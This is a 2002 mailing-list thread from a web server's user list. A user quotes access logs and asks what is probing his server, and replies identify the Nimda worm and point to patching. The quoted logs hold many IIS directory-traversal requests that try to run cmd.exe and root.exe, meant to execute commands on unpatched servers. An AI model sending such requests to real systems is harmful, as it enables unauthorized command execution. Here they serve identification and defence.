Actually I would not recommend supplying the fixes to the offender. Instead I would
recommend they download the hotfix examiner from MS. Utilizing XML this examiner will
evaluate all the products and required hotfixes and give them a report. There have
been numerous hotfixes releases since Nimda first arrived for several products besides
IIS. It would be best to plug all the holes and not just one. If anyone would like you
can email me off list and I will send anyone asking the hotfix checker and the latest
XML, but I would prefer you to go to MS and download them :)
Danny
On 11/May/2002 10:37:17, Kim A. Currier wrote:
> If anyone needs the file, Dave, I have IIs Running, and I have the "Healing"
> File for anyone that needs it. Just email me, it is only a few Kbytes, and
> can be easily emailed.....
>
> Kim
>
> ----- Original Message -----
> From: "Dave Culbertson" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Saturday, May 11, 2002 8:02 AM
> Subject: [sambar] Access log entries {03}
>
>
> > Thanks, Hank Tony and Alex. I was aware that it was no harm to Sambar and
> since I don't run IIs, no worries here. However, I have tracked down one of
> the offending servers and wanted to contact them with informed information.
> That's why I needed the name of the virus on their server.
> >
> > Dave Culbertson
> >
> > On 11/May/2002 10:51:22, Tony Mallen wrote:
> > > Nimda virus from unpatched microft servers.But its getting a 404 error
> so should be okay.
> > >
> > > On 11/May/2002 04:59:49, Dave Culbertson wrote:
> > > > Does anyone recognize what kind of virus or bot would cause the
> following access log entries?
> > > >
> > > > 64.65.199.33 - - [04/May/2002:00:45:06 -0400] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:07 -0400] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:08 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:09 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:10 -0400] "GET
> /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:11 -0400] "GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:12 -0400] "GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
> 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET
> /msadc/..%5c../..%5c../..%5c/..��../..��../..��../winnt/system32/cmd.exe?/c+
> dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:13 -0400] "GET
> /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:14 -0400] "GET
> /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:15 -0400] "GET
> /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:16 -0400] "GET
> /scripts/..�o../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:17 -0400] "GET
> /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:21 -0400] "GET
> /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:23 -0400] "GET
> /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > > 64.65.199.33 - - [04/May/2002:00:45:25 -0400] "GET
> /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> > > >
> > > > I am being accessed by quite a few computers with the same or simular
> entries and would like to know the name of what this is. Thanks.
> > > >
> > > > Dave Culbertson
> > > >
> > > > -------------------------------------------------------
> > > > To unsubscribe please go to <A TARGET="_blank"
> HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> > > >
> > > >
> > > >
> > > >
> > > >
> > > >
> > >
> > >
> > >
> > >
> > >
> > >
> > > -------------------------------------------------------
> > > To unsubscribe please go to <A TARGET="_blank"
> HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> > >
> >
> > -------------------------------------------------------
> > To unsubscribe please go to <A TARGET="_blank"
>HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
> >
> >
> >
> >
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (<A TARGET="_blank"
>HREF="http://www.grisoft.com";>http://www.grisoft.com</A>).
> Version: 6.0.361 / Virus Database: 199 - Release Date: 5/7/02
>
> -------------------------------------------------------
> To unsubscribe please go to <A TARGET="_blank"
>HREF="http://www.sambar.ch/list/";>http://www.sambar.ch/list/</A>
>
>
>
>
>
>
-------------------------------------------------------
To unsubscribe please go to http://www.sambar.ch/list/
